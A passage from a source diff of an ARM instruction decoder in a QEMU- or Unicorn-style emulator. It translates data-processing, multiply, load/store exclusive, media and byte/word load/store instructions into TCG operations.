8) & 0xf) * 2; + if (shift) + val = (val >> shift) | (val << (32 - shift)); + i = ((insn & (1 << 22)) != 0); + if (gen_set_psr_im(s, msr_mask(s, (insn >> 16) & 0xf, i), + i, val)) { + goto illegal_op; + } + } + } + } else if ((insn & 0x0f900000) == 0x01000000 + && (insn & 0x00000090) != 0x00000090) { + /* miscellaneous instructions */ + op1 = (insn >> 21) & 3; + sh = (insn >> 4) & 0xf; + rm = insn & 0xf; + switch (sh) { + case 0x0: /* move program status register */ + if (op1 & 1) { + /* PSR = reg */ + tmp = load_reg(s, rm); + i = ((op1 & 2) != 0); + if (gen_set_psr(s, msr_mask(s, (insn >> 16) & 
0xf, i), i, tmp)) + goto illegal_op; + } else { + /* reg = PSR */ + rd = (insn >> 12) & 0xf; + if (op1 & 2) { + if (IS_USER(s)) + goto illegal_op; + tmp = load_cpu_field(s->uc, spsr); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + gen_helper_cpsr_read(tcg_ctx, tmp, tcg_ctx->cpu_env); + } + store_reg(s, rd, tmp); + } + break; + case 0x1: + if (op1 == 1) { + /* branch/exchange thumb (bx). */ + ARCH(4T); + tmp = load_reg(s, rm); + gen_bx(s, tmp); + } else if (op1 == 3) { + /* clz */ + ARCH(5); + rd = (insn >> 12) & 0xf; + tmp = load_reg(s, rm); + gen_helper_clz(tcg_ctx, tmp, tmp); + store_reg(s, rd, tmp); + } else { + goto illegal_op; + } + break; + case 0x2: + if (op1 == 1) { + ARCH(5J); /* bxj */ + /* Trivial implementation equivalent to bx. */ + tmp = load_reg(s, rm); + gen_bx(s, tmp); + } else { + goto illegal_op; + } + break; + case 0x3: + if (op1 != 1) + goto illegal_op; + + ARCH(5); + /* branch link/exchange thumb (blx) */ + tmp = load_reg(s, rm); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, s->pc); + store_reg(s, 14, tmp2); + gen_bx(s, tmp); + break; + case 0x4: + { + /* crc32/crc32c */ + uint32_t c = extract32(insn, 8, 4); + + /* Check this CPU supports ARMv8 CRC instructions. + * op1 == 3 is UNPREDICTABLE but handle as UNDEFINED. + * Bits 8, 10 and 11 should be zero. 
+ */ + if (!arm_dc_feature(s, ARM_FEATURE_CRC) || op1 == 0x3 || + (c & 0xd) != 0) { + goto illegal_op; + } + + rn = extract32(insn, 16, 4); + rd = extract32(insn, 12, 4); + + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + if (op1 == 0) { + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xff); + } else if (op1 == 1) { + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff); + } + tmp3 = tcg_const_i32(tcg_ctx, 1 << op1); + if (c & 0x2) { + gen_helper_crc32c(tcg_ctx, tmp, tmp, tmp2, tmp3); + } else { + gen_helper_crc32(tcg_ctx, tmp, tmp, tmp2, tmp3); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + store_reg(s, rd, tmp); + break; + } + case 0x5: /* saturating add/subtract */ + ARCH(5TE); + rd = (insn >> 12) & 0xf; + rn = (insn >> 16) & 0xf; + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rn); + if (op1 & 2) + gen_helper_double_saturate(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2); + if (op1 & 1) + gen_helper_sub_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_add_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 7: + { + int imm16 = extract32(insn, 0, 4) | (extract32(insn, 8, 12) << 4); + switch (op1) { + case 1: + /* bkpt */ + ARCH(5); + gen_exception_insn(s, 4, EXCP_BKPT, + syn_aa32_bkpt(imm16, false)); + break; + case 2: + /* Hypervisor call (v7) */ + ARCH(7); + if (IS_USER(s)) { + goto illegal_op; + } + gen_hvc(s, imm16); + break; + case 3: + /* Secure monitor call (v6+) */ + ARCH(6K); + if (IS_USER(s)) { + goto illegal_op; + } + gen_smc(s); + break; + default: + goto illegal_op; + } + break; + } + case 0x8: /* signed multiply */ + case 0xa: + case 0xc: + case 0xe: + ARCH(5TE); + rs = (insn >> 8) & 0xf; + rn = (insn >> 12) & 0xf; + rd = (insn >> 16) & 0xf; + if (op1 == 1) { + /* (32 * 16) >> 16 */ + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + if (sh & 4) + tcg_gen_sari_i32(tcg_ctx, tmp2, tmp2, 16); + else + gen_sxth(tmp2); + tmp64 = 
gen_muls_i64_i32(s, tmp, tmp2); + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 16); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + if ((sh & 2) == 0) { + tmp2 = load_reg(s, rn); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rd, tmp); + } else { + /* 16 * 16 */ + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + gen_mulxy(s, tmp, tmp2, sh & 2, sh & 4); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (op1 == 2) { + tmp64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_addq(s, tmp64, rn, rd); + gen_storeq_reg(s, rn, rd, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + if (op1 == 0) { + tmp2 = load_reg(s, rn); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rd, tmp); + } + } + break; + default: + goto illegal_op; + } + } else if (((insn & 0x0e000000) == 0 && + (insn & 0x00000090) != 0x90) || + ((insn & 0x0e000000) == (1 << 25))) { + int set_cc, logic_cc, shiftop; + + op1 = (insn >> 21) & 0xf; + set_cc = (insn >> 20) & 1; + logic_cc = table_logic_cc[op1] & set_cc; + + /* data processing instruction */ + if (insn & (1 << 25)) { + /* immediate operand */ + val = insn & 0xff; + shift = ((insn >> 8) & 0xf) * 2; + if (shift) { + val = (val >> shift) | (val << (32 - shift)); + } + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, val); + if (logic_cc && shift) { + gen_set_CF_bit31(s, tmp2); + } + } else { + /* register */ + rm = (insn) & 0xf; + tmp2 = load_reg(s, rm); + shiftop = (insn >> 5) & 3; + if (!(insn & (1 << 4))) { + shift = (insn >> 7) & 0x1f; + gen_arm_shift_im(s, tmp2, shiftop, shift, logic_cc); + } else { + rs = (insn >> 8) & 0xf; + tmp = load_reg(s, rs); + gen_arm_shift_reg(s, tmp2, shiftop, tmp, logic_cc); + } + } + if (op1 != 0x0f && op1 != 0x0d) { + rn = (insn 
>> 16) & 0xf; + tmp = load_reg(s, rn); + } else { + TCGV_UNUSED_I32(tmp); + } + rd = (insn >> 12) & 0xf; + switch(op1) { + case 0x00: + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x01: + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x02: + if (set_cc && rd == 15) { + /* SUBS r15, ... is used for exception return. */ + if (IS_USER(s)) { + goto illegal_op; + } + gen_sub_CC(s, tmp, tmp, tmp2); + gen_exception_return(s, tmp); + } else { + if (set_cc) { + gen_sub_CC(s, tmp, tmp, tmp2); + } else { + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + } + store_reg_bx(s, rd, tmp); + } + break; + case 0x03: + if (set_cc) { + gen_sub_CC(s, tmp, tmp2, tmp); + } else { + tcg_gen_sub_i32(tcg_ctx, tmp, tmp2, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x04: + if (set_cc) { + gen_add_CC(s, tmp, tmp, tmp2); + } else { + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + } + store_reg_bx(s, rd, tmp); + break; + case 0x05: + if (set_cc) { + gen_adc_CC(s, tmp, tmp, tmp2); + } else { + gen_add_carry(s, tmp, tmp, tmp2); + } + store_reg_bx(s, rd, tmp); + break; + case 0x06: + if (set_cc) { + gen_sbc_CC(s, tmp, tmp, tmp2); + } else { + gen_sub_carry(s, tmp, tmp, tmp2); + } + store_reg_bx(s, rd, tmp); + break; + case 0x07: + if (set_cc) { + gen_sbc_CC(s, tmp, tmp2, tmp); + } else { + gen_sub_carry(s, tmp, tmp2, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x08: + if (set_cc) { + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + gen_logic_CC(s, tmp); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x09: + if (set_cc) { + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, tmp2); + gen_logic_CC(s, tmp); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x0a: + if (set_cc) { + gen_sub_CC(s, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x0b: + if (set_cc) { + gen_add_CC(s, tmp, tmp, tmp2); + } + 
tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x0c: + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x0d: + if (logic_cc && rd == 15) { + /* MOVS r15, ... is used for exception return. */ + if (IS_USER(s)) { + goto illegal_op; + } + gen_exception_return(s, tmp2); + } else { + if (logic_cc) { + gen_logic_CC(s, tmp2); + } + store_reg_bx(s, rd, tmp2); + } + break; + case 0x0e: + tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp); + } + store_reg_bx(s, rd, tmp); + break; + default: + case 0x0f: + tcg_gen_not_i32(tcg_ctx, tmp2, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp2); + } + store_reg_bx(s, rd, tmp2); + break; + } + if (op1 != 0x0f && op1 != 0x0d) { + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } else { + /* other instructions */ + op1 = (insn >> 24) & 0xf; + switch(op1) { + case 0x0: + case 0x1: + /* multiplies, extra load/stores */ + sh = (insn >> 5) & 3; + if (sh == 0) { + if (op1 == 0x0) { + rd = (insn >> 16) & 0xf; + rn = (insn >> 12) & 0xf; + rs = (insn >> 8) & 0xf; + rm = (insn) & 0xf; + op1 = (insn >> 20) & 0xf; + switch (op1) { + case 0: case 1: case 2: case 3: case 6: + /* 32 bit mul */ + tmp = load_reg(s, rs); + tmp2 = load_reg(s, rm); + tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (insn & (1 << 22)) { + /* Subtract (mls) */ + ARCH(6T2); + tmp2 = load_reg(s, rn); + tcg_gen_sub_i32(tcg_ctx, tmp, tmp2, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + } else if (insn & (1 << 21)) { + /* Add */ + tmp2 = load_reg(s, rn); + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + if (insn & (1 << 20)) + gen_logic_CC(s, tmp); + store_reg(s, rd, tmp); + break; + case 4: + /* 64 bit mul double accumulate (UMAAL) */ + ARCH(6); + tmp = load_reg(s, rs); + tmp2 = load_reg(s, rm); + tmp64 = gen_mulu_i64_i32(s, tmp, tmp2); + gen_addq_lo(s, tmp64, rn); + gen_addq_lo(s, tmp64, rd); + 
gen_storeq_reg(s, rn, rd, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + break; + case 8: case 9: case 10: case 11: + case 12: case 13: case 14: case 15: + /* 64 bit mul: UMULL, UMLAL, SMULL, SMLAL. */ + tmp = load_reg(s, rs); + tmp2 = load_reg(s, rm); + if (insn & (1 << 22)) { + tcg_gen_muls2_i32(tcg_ctx, tmp, tmp2, tmp, tmp2); + } else { + tcg_gen_mulu2_i32(tcg_ctx, tmp, tmp2, tmp, tmp2); + } + if (insn & (1 << 21)) { /* mult accumulate */ + TCGv_i32 al = load_reg(s, rn); + TCGv_i32 ah = load_reg(s, rd); + tcg_gen_add2_i32(tcg_ctx, tmp, tmp2, tmp, tmp2, al, ah); + tcg_temp_free_i32(tcg_ctx, al); + tcg_temp_free_i32(tcg_ctx, ah); + } + if (insn & (1 << 20)) { + gen_logicq_cc(s, tmp, tmp2); + } + store_reg(s, rn, tmp); + store_reg(s, rd, tmp2); + break; + default: + goto illegal_op; + } + } else { + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + if (insn & (1 << 23)) { + /* load/store exclusive */ + int op2 = (insn >> 8) & 3; + op1 = (insn >> 21) & 0x3; + + switch (op2) { + case 0: /* lda/stl */ + if (op1 == 1) { + goto illegal_op; + } + ARCH(8); + break; + case 1: /* reserved */ + goto illegal_op; + case 2: /* ldaex/stlex */ + ARCH(8); + break; + case 3: /* ldrex/strex */ + if (op1) { + ARCH(6K); + } else { + ARCH(6); + } + break; + } + + addr = tcg_temp_local_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + + /* Since the emulation does not have barriers, + the acquire/release semantics need no special + handling */ + if (op2 == 0) { + if (insn & (1 << 20)) { + tmp = tcg_temp_new_i32(tcg_ctx); + switch (op1) { + case 0: /* lda */ + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* ldab */ + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 3: /* ldah */ + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + store_reg(s, rd, tmp); + } else { + rm = insn & 0xf; + tmp = load_reg(s, rm); + switch (op1) { + case 0: /* stl */ + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* 
stlb */ + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + break; + case 3: /* stlh */ + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + } else if (insn & (1 << 20)) { + switch (op1) { + case 0: /* ldrex */ + gen_load_exclusive(s, rd, 15, addr, 2); + break; + case 1: /* ldrexd */ + gen_load_exclusive(s, rd, rd + 1, addr, 3); + break; + case 2: /* ldrexb */ + gen_load_exclusive(s, rd, 15, addr, 0); + break; + case 3: /* ldrexh */ + gen_load_exclusive(s, rd, 15, addr, 1); + break; + default: + abort(); + } + } else { + rm = insn & 0xf; + switch (op1) { + case 0: /* strex */ + gen_store_exclusive(s, rd, rm, 15, addr, 2); + break; + case 1: /* strexd */ + gen_store_exclusive(s, rd, rm, rm + 1, addr, 3); + break; + case 2: /* strexb */ + gen_store_exclusive(s, rd, rm, 15, addr, 0); + break; + case 3: /* strexh */ + gen_store_exclusive(s, rd, rm, 15, addr, 1); + break; + default: + abort(); + } + } + tcg_temp_free_i32(tcg_ctx, addr); + } else { + /* SWP instruction */ + rm = (insn) & 0xf; + + /* ??? This is not really atomic. However we know + we never have multiple CPUs running in parallel, + so it is good enough. 
*/ + addr = load_reg(s, rn); + tmp = load_reg(s, rm); + tmp2 = tcg_temp_new_i32(tcg_ctx); + if (insn & (1 << 22)) { + gen_aa32_ld8u(s, tmp2, addr, get_mem_index(s)); + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + } else { + gen_aa32_ld32u(s, tmp2, addr, get_mem_index(s)); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + store_reg(s, rd, tmp2); + } + } + } else { + int address_offset; + int load = insn & (1 << 20); + int wbit = insn & (1 << 21); + int pbit = insn & (1 << 24); + int doubleword = 0; + /* Misc load/store */ + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + if (!load && (sh & 2)) { + /* doubleword */ + ARCH(5TE); + if (rd & 1) { + /* UNPREDICTABLE; we choose to UNDEF */ + goto illegal_op; + } + load = (sh & 1) == 0; + doubleword = 1; + } + addr = load_reg(s, rn); + if (pbit) + gen_add_datah_offset(s, insn, 0, addr); + address_offset = 0; + if (doubleword) { + if (!load) { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = load_reg(s, rd + 1); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + rd++; + } + address_offset = -4; + } else if (load) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + switch(sh) { + case 1: + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 2: + gen_aa32_ld8s(s, tmp, addr, get_mem_index(s)); + break; + default: + case 3: + gen_aa32_ld16s(s, tmp, addr, get_mem_index(s)); + break; + } + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); 
+ } + /* Perform base writeback before the loaded value to + ensure correct behavior with overlapping index registers. + ldrd with base writeback is is undefined if the + destination and index registers overlap. */ + if (!pbit) { + gen_add_datah_offset(s, insn, address_offset, addr); + store_reg(s, rn, addr); + } else if (wbit) { + if (address_offset) + tcg_gen_addi_i32(tcg_ctx, addr, addr, address_offset); + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + if (load) { + /* Complete the load. */ + store_reg(s, rd, tmp); + } + } + break; + case 0x4: + case 0x5: + goto do_ldst; + case 0x6: + case 0x7: + if (insn & (1 << 4)) { + ARCH(6); + /* Armv6 Media instructions. */ + rm = insn & 0xf; + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + rs = (insn >> 8) & 0xf; + switch ((insn >> 23) & 3) { + case 0: /* Parallel add/subtract. */ + op1 = (insn >> 20) & 7; + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + sh = (insn >> 5) & 7; + if ((op1 & 3) == 0 || sh == 5 || sh == 6) + goto illegal_op; + gen_arm_parallel_addsub(s, op1, sh, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 1: + if ((insn & 0x00700020) == 0) { + /* Halfword pack. 
*/ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + shift = (insn >> 7) & 0x1f; + if (insn & (1 << 6)) { + /* pkhtb */ + if (shift == 0) + shift = 31; + tcg_gen_sari_i32(tcg_ctx, tmp2, tmp2, shift); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xffff0000); + tcg_gen_ext16u_i32(tcg_ctx, tmp2, tmp2); + } else { + /* pkhbt */ + if (shift) + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, shift); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff0000); + } + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((insn & 0x00200020) == 0x00200000) { + /* [us]sat */ + tmp = load_reg(s, rm); + shift = (insn >> 7) & 0x1f; + if (insn & (1 << 6)) { + if (shift == 0) + shift = 31; + tcg_gen_sari_i32(tcg_ctx, tmp, tmp, shift); + } else { + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, shift); + } + sh = (insn >> 16) & 0x1f; + tmp2 = tcg_const_i32(tcg_ctx, sh); + if (insn & (1 << 22)) + gen_helper_usat(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_ssat(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((insn & 0x00300fe0) == 0x00200f20) { + /* [us]sat16 */ + tmp = load_reg(s, rm); + sh = (insn >> 16) & 0x1f; + tmp2 = tcg_const_i32(tcg_ctx, sh); + if (insn & (1 << 22)) + gen_helper_usat16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_ssat16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((insn & 0x00700fe0) == 0x00000fa0) { + /* Select bytes. 
*/ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + tmp3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, tmp3, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + gen_helper_sel_flags(tcg_ctx, tmp, tmp3, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((insn & 0x000003e0) == 0x00000060) { + tmp = load_reg(s, rm); + shift = (insn >> 10) & 3; + /* ??? In many cases it's not necessary to do a + rotate, a shift is sufficient. */ + if (shift != 0) + tcg_gen_rotri_i32(tcg_ctx, tmp, tmp, shift * 8); + op1 = (insn >> 20) & 7; + switch (op1) { + case 0: gen_sxtb16(tmp); break; + case 2: gen_sxtb(tmp); break; + case 3: gen_sxth(tmp); break; + case 4: gen_uxtb16(tmp); break; + case 6: gen_uxtb(tmp); break; + case 7: gen_uxth(tmp); break; + default: goto illegal_op; + } + if (rn != 15) { + tmp2 = load_reg(s, rn); + if ((op1 & 3) == 0) { + gen_add16(s, tmp, tmp2); + } else { + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } + store_reg(s, rd, tmp); + } else if ((insn & 0x003f0f60) == 0x003f0f20) { + /* rev */ + tmp = load_reg(s, rm); + if (insn & (1 << 22)) { + if (insn & (1 << 7)) { + gen_revsh(s, tmp); + } else { + ARCH(6T2); + gen_helper_rbit(tcg_ctx, tmp, tmp); + } + } else { + if (insn & (1 << 7)) + gen_rev16(s, tmp); + else + tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); + } + store_reg(s, rd, tmp); + } else { + goto illegal_op; + } + break; + case 2: /* Multiplies (Type 3). */ + switch ((insn >> 20) & 0x7) { + case 5: + if (((insn >> 6) ^ (insn >> 7)) & 1) { + /* op2 not 00x or 11x : UNDEF */ + goto illegal_op; + } + /* Signed multiply most significant [accumulate]. 
+ (SMMUL, SMMLA, SMMLS) */ + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + + if (rd != 15) { + tmp = load_reg(s, rd); + if (insn & (1 << 6)) { + tmp64 = gen_subq_msw(s, tmp64, tmp); + } else { + tmp64 = gen_addq_msw(s, tmp64, tmp); + } + } + if (insn & (1 << 5)) { + tcg_gen_addi_i64(tcg_ctx, tmp64, tmp64, 0x80000000u); + } + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 32); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + store_reg(s, rn, tmp); + break; + case 0: + case 4: + /* SMLAD, SMUAD, SMLSD, SMUSD, SMLALD, SMLSLD */ + if (insn & (1 << 7)) { + goto illegal_op; + } + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + if (insn & (1 << 5)) + gen_swap_half(s, tmp2); + gen_smul_dual(s, tmp, tmp2); + if (insn & (1 << 22)) { + /* smlald, smlsld */ + TCGv_i64 tmp64_2; + + tmp64 = tcg_temp_new_i64(tcg_ctx); + tmp64_2 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64, tmp); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64_2, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (insn & (1 << 6)) { + tcg_gen_sub_i64(tcg_ctx, tmp64, tmp64, tmp64_2); + } else { + tcg_gen_add_i64(tcg_ctx, tmp64, tmp64, tmp64_2); + } + tcg_temp_free_i64(tcg_ctx, tmp64_2); + gen_addq(s, tmp64, rd, rn); + gen_storeq_reg(s, rd, rn, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + /* smuad, smusd, smlad, smlsd */ + if (insn & (1 << 6)) { + /* This subtraction cannot overflow. */ + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + } else { + /* This addition cannot overflow 32 bits; + * however it may overflow considered as a + * signed operation, in which case we must set + * the Q flag. 
+ */ + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rd != 15) + { + tmp2 = load_reg(s, rd); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rn, tmp); + } + break; + case 1: + case 3: + /* SDIV, UDIV */ + if (!arm_dc_feature(s, ARM_FEATURE_ARM_DIV)) { + goto illegal_op; + } + if (((insn >> 5) & 7) || (rd != 15)) { + goto illegal_op; + } + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + if (insn & (1 << 21)) { + gen_helper_udiv(tcg_ctx, tmp, tmp, tmp2); + } else { + gen_helper_sdiv(tcg_ctx, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rn, tmp); + break; + default: + goto illegal_op; + } + break; + case 3: + op1 = ((insn >> 17) & 0x38) | ((insn >> 5) & 7); + switch (op1) { + case 0: /* Unsigned sum of absolute differences. */ + ARCH(6); + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + gen_helper_usad8(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rd != 15) { + tmp2 = load_reg(s, rd); + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rn, tmp); + break; + case 0x20: case 0x24: case 0x28: case 0x2c: + /* Bitfield insert/clear. 
*/ + ARCH(6T2); + shift = (insn >> 7) & 0x1f; + i = (insn >> 16) & 0x1f; + i = i + 1 - shift; + if (rm == 15) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else { + tmp = load_reg(s, rm); + } + if (i != 32) { + tmp2 = load_reg(s, rd); + tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, shift, i); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rd, tmp); + break; + case 0x12: case 0x16: case 0x1a: case 0x1e: /* sbfx */ + case 0x32: case 0x36: case 0x3a: case 0x3e: /* ubfx */ + ARCH(6T2); + tmp = load_reg(s, rm); + shift = (insn >> 7) & 0x1f; + i = ((insn >> 16) & 0x1f) + 1; + if (shift + i > 32) + goto illegal_op; + if (i < 32) { + if (op1 & 0x20) { + gen_ubfx(s, tmp, shift, (1u << i) - 1); + } else { + gen_sbfx(s, tmp, shift, i); + } + } + store_reg(s, rd, tmp); + break; + default: + goto illegal_op; + } + break; + } + break; + } + do_ldst: + /* Check for undefined extension instructions + * per the ARM Bible IE: + * xxxx 0111 1111 xxxx xxxx xxxx 1111 xxxx + */ + sh = (0xf << 20) | (0xf << 4); + if (op1 == 0x7 && ((insn & sh) == sh)) + { + goto illegal_op; + } + /* load/store byte/word */ + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + tmp2 = load_reg(s, rn); + if ((insn & 0x01200000) == 0x00200000) { + /* ldrt/strt */ + i = MMU_USER_IDX; + } else { + i = get_mem_index(s); + } + if (insn & (1 << 24)) + gen_add_data_offset(s, insn, tmp2); + if (insn & (1 << 20)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (insn & (1 << 22)) { + gen_aa32_ld8u(s, tmp, tmp2, i); + } else { + gen_aa32_ld32u(s, tmp, tmp2, i); + } + } else { + /* store */ + tmp = load_reg(s, rd); + if (insn & (1 << 22)) { + gen_aa32_st8(s, tmp, tmp2, i); + } else { + gen_aa32_st32(s, tmp, tmp2, i); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + if (!(insn & (1 << 24))) { + gen_add_data_offset(s, insn, tmp2); + store_reg(s, rn, tmp2); + } else if (insn & (1 << 21)) { + store_reg(s, rn, tmp2); + } else { + tcg_temp_free_i32(tcg_ctx, tmp2); + } + if (insn & 
